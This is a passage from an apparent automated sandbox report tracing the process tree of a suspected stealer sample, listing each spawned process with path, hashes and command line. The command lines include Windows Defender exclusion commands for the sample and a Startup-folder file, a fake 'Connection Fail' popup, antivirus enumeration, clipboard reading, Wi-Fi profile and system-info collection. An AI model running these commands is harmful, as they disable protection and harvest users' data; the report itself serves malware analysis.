                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:12
                                                                                                                                                                                                                                                                                                                      Start time:14:19:04
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\El9HaBFrFM.exe'
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:13
                                                                                                                                                                                                                                                                                                                      Start time:14:19:04
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:14
                                                                                                                                                                                                                                                                                                                      Start time:14:19:04
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7356c0000
                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:15
                                                                                                                                                                                                                                                                                                                      Start time:14:19:04
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:16
                                                                                                                                                                                                                                                                                                                      Start time:14:19:04
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('couldn\x22t run, poor connection try again later.', 0, 'Connection Fail', 0+16);close()"
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff625d80000
                                                                                                                                                                                                                                                                                                                      File size:14'848 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:17
                                                                                                                                                                                                                                                                                                                      Start time:14:19:04
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:18
                                                                                                                                                                                                                                                                                                                      Start time:14:19:04
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\bound.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:bound.exe
                                                                                                                                                                                                                                                                                                                      Imagebase:0x26c525e0000
                                                                                                                                                                                                                                                                                                                      File size:1'152'512 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:42B9EB8BF1D2D2AABDA3977656AF4364
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:19
                                                                                                                                                                                                                                                                                                                      Start time:14:19:04
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:20
                                                                                                                                                                                                                                                                                                                      Start time:14:19:05
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7356c0000
                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:21
                                                                                                                                                                                                                                                                                                                      Start time:14:19:05
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7356c0000
                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:22
                                                                                                                                                                                                                                                                                                                      Start time:14:19:05
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:23
                                                                                                                                                                                                                                                                                                                      Start time:14:19:05
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:24
                                                                                                                                                                                                                                                                                                                      Start time:14:19:06
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6c6920000
                                                                                                                                                                                                                                                                                                                      File size:106'496 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:25
                                                                                                                                                                                                                                                                                                                      Start time:14:19:06
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6c6920000
                                                                                                                                                                                                                                                                                                                      File size:106'496 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:26
                                                                                                                                                                                                                                                                                                                      Start time:14:19:07
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7356c0000
                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:27
                                                                                                                                                                                                                                                                                                                      Start time:14:19:07
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:28
                                                                                                                                                                                                                                                                                                                      Start time:14:19:07
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7356c0000
                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:29
                                                                                                                                                                                                                                                                                                                      Start time:14:19:07
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7356c0000
                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:30
                                                                                                                                                                                                                                                                                                                      Start time:14:19:07
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:31
                                                                                                                                                                                                                                                                                                                      Start time:14:19:07
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6e2040000
                                                                                                                                                                                                                                                                                                                      File size:576'000 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:32
                                                                                                                                                                                                                                                                                                                      Start time:14:19:07
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:powershell Get-Clipboard
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:33
                                                                                                                                                                                                                                                                                                                      Start time:14:19:07
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:34
                                                                                                                                                                                                                                                                                                                      Start time:14:19:08
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6c6920000
                                                                                                                                                                                                                                                                                                                      File size:106'496 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:35
                                                                                                                                                                                                                                                                                                                      Start time:14:19:09
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7356c0000
                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:36
                                                                                                                                                                                                                                                                                                                      Start time:14:19:09
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7356c0000
                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:37
                                                                                                                                                                                                                                                                                                                      Start time:14:19:09
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7356c0000
                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:38
                                                                                                                                                                                                                                                                                                                      Start time:14:19:09
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:39
                                                                                                                                                                                                                                                                                                                      Start time:14:19:09
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:40
                                                                                                                                                                                                                                                                                                                      Start time:14:19:09
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:41
                                                                                                                                                                                                                                                                                                                      Start time:14:19:09
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
